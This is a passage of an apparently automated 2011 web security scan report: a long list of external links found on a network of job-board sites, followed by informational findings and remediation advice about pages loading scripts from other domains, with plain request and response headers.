http://www.bmwusa.com/standard/content/vehicles/2011/3/335iconvertible/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335iconvertible/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335iconvertible/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/3seriescoupemediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335isconvertible/3seriesconvertiblemediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335isconvertible/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335isconvertible/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335isconvertible/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335iscoupe/3seriescoupemediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335iscoupe/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335iscoupe/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335iscoupe/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/3seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/3seriessedanmediagallery.aspx%20%20
http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivecoupe/3seriescoupemediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivecoupe/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivecoupe/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivecoupe/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivesedan/3seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivesedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivesedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivesedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/3convertibleexplorenew.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/3coupeexplorenew.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/3sedanexplore.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/5seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/5seriessedanmediagallery.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/5seriesgranturismomediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/535isedan/5seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535isedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535isedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535isedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/5seriesgranturismomediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/5seriesgranturismomediagallery.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivesedan/5seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivesedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivesedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivesedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/5seriesgranturismomediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/550isedan/5seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550isedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550isedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550isedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/5seriesgranturismomediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/5seriesgranturismomediagallery.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/5seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/5explore.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/5granturismoexplore.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/7seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/7seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/750isedan/7seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750isedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750isedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750isedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/7seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/750lisedan/7seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750lisedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750lisedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750lisedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/7seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/7seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/7seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/7seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/allnew7series.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x3/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x3/x3savexplore.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/x3seriessavmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/x3seriessavmediagallery.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/x3seriessavmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/x3seriessavmediagallery.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x5/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x5/x5savexplorenew.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/x5seriessavmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/x5seriessavmediagallery.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35i/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35i/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35i/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35i/x5seriessavmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/x5seriessavmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/x5seriessavmediagallery.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/x5seriessavmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/x5seriessavmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/x6seriessacmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/x6explore.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/x6seriessacmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/x6seriessacmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/z4/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4explore.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/z4seriesroadstermediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/z4seriesroadstermediagallery.aspx
https://www.bmwusa.com/Secured/Content/Forms/Login.aspx
http://www.businessanalystcrossing.com/
http://www.businessdevelopmentcrossing.com/
http://www.businessweek.com/news/2011-01-20/merrill-lynch-jm-said-to-be-hired-for-power-finance-share-sale.html
http://www.callcentercrossing.com/
http://www.chefcrossing.com/
http://www.civilengineeringcrossing.com/
http://www.clevelcrossing.com/
http://www.clinicalresearchcrossing.com/
http://www.codylindley.com/
http://www.compliancecrossing.com/
http://www.computeraideddesigncrossing.com/
http://www.constructioncrossing.com/
http://www.consultingcrossing.com/
http://www.contractmanagementcrossing.com/
http://www.counselingcrossing.com/
http://www.cpluspluscrossing.com/
http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal
http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity
http://www.customerservicecrossing.com/
http://www.dbacrossing.com/
http://www.dentalcrossing.com/
http://www.designingcrossing.com/
http://www.directstartv.com/
http://www.diversitycrossing.com/
http://www.dotnetcrossing.com/
http://www.ecommercecrossing.com/
http://www.edfed.com/
http://www.editingcrossing.com/
http://www.educationcrossing.com/
http://www.employmentauthority.com/
http://www.employmentcrossing.com/
http://www.energycrossing.com/
http://www.engineeringcrossing.com/
http://www.entrylevelcrossing.com/
http://www.environmentalcrossing.com/
http://www.environmentalsafetyhealthcrossing.com/
http://www.ericmmartin.com/projects/simplemodal/
http://www.erpcrossing.com/
http://www.execcrossing.com/
http://www.facebook.com/BMWUSA
http://www.facebook.com/EmploymentXing
http://www.facebook.com/pages/JD2B/298408284363
http://www.facebook.com/piyush.v.bhatt
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/yahoonews
http://www.facilitiescrossing.com/
http://www.financialservicescrossing.com/
http://www.foodservicescrossing.com/
http://www.fundraisingcrossing.com/
http://www.giscrossing.com/
http://www.governmentcrossing.com/
http://www.graduateschoolloans.com/
http://www.healthcarecrossing.com/
http://www.helpdeskcrossing.com/
http://www.hospitalitycrossing.com/
http://www.hototc.com/
http://www.hound.com/
http://www.hrcrossing.com/
http://www.huffingtonpost.com/2011/01/05/david-koch-tea-party-republicans_n_804997.html
http://www.huffingtonpost.com/2011/01/12/sarah-palin-arizona-shooting-statement_n_807833.html
http://www.huffingtonpost.com/2011/01/19/craziest-ways-to-pay-tuit_n_811038.html
http://www.hvaccrossing.com/
http://www.informationtechnologycrossing.com/
http://www.insurcrossing.com/
http://www.intellectualpropertycrossing.com/
http://www.internshipcrossing.com/
http://www.j2eecrossing.com/
http://www.journalismcrossing.com/
http://www.lawcrossing.com/
http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/
http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/
http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/
http://www.lawcrossing.com/lcjssearchresults.php
http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php
http://www.lawfirmstaff.com/
http://www.lawschoolloanreport.org/
http://www.lawschoolloans.com/
https://www.lawschoolloans.com/lslprivateloan_application.php
http://www.legalauthority.com/
http://www.legalauthority.com/signup.php
http://www.logisticscrossing.com/
http://www.managercrossing.com/
http://www.manufacturingcrossing.com/
http://www.marketingcrossing.com/
http://www.mediajobcrossing.com/
http://www.medicalschoolloans.com/
http://www.militarycrossing.com/
http://www.msnbc.msn.com/id/41161439/ns/politics-more_politics/
http://www.nursingcrossing.com/
http://www.occupationaltherapycrossing.com/
http://www.opensource.org/licenses/gpl-license.php
http://www.opensource.org/licenses/mit-license.php
http://www.operationscrossing.com/
http://www.parttimecrossing.com/
http://www.pharmaceuticalcrossing.com/
http://www.physicalsecuritycrossing.com/
http://www.physicaltherapycrossing.com/
http://www.planningcrossing.com/
http://www.politico.com/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html
http://www.postdoctoralfellowcrossing.com/
http://www.prcrossing.com/
http://www.preferredresumes.com/
http://www.procurementcrossing.com/
http://www.productmanagercrossing.com/
http://www.projectmanagementcrossing.com/
http://www.publicinterestcrossing.com/
http://www.publishingcrossing.com/
http://www.purchasingcrossing.com/
http://www.qaqccrossing.com/
http://www.radiocrossing.com/
http://www.realestateandlandcrossing.com/
http://www.recruitingcrossing.com/
http://www.researchingcrossing.com/
http://www.retailcrossing.com/
http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114
http://www.sciencescrossing.com/
http://www.scientistcrossing.com/
http://www.sellingcrossing.com/
http://www.sourcewatch.org/index.php
http://www.sqlcrossing.com/
http://www.teenagercrossing.com/
http://www.telecomcrossing.com/
http://www.toyota.com/dealers/
http://www.toyota.com/ideas-for-good/
http://www.toyota.com/mobilepromo/
http://www.toyota.com/safety/
http://www.toyota.com/toyota-care/
http://www.tradingcrossing.com/
http://www.trainingcrossing.com/
http://www.transportationcrossing.com/
http://www.travelingcrossing.com/
http://www.truckingcrossing.com/
http://www.tvcrossing.com/
http://www.underwritingcrossing.com/
http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm
http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP
http://www.veterinarycrossing.com/
http://www.volunteercrossing.com/
http://www.woothemes.com/
http://www.workathomecrossing.com/
http://www.writingcrossing.com/

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

15.1. http://www.100kcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.100kcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.100kcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:12 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4gi6e55n6c5ims48r8g0gv1692; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:12 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106106

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.2. http://www.accountingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.accountingcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.accountingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
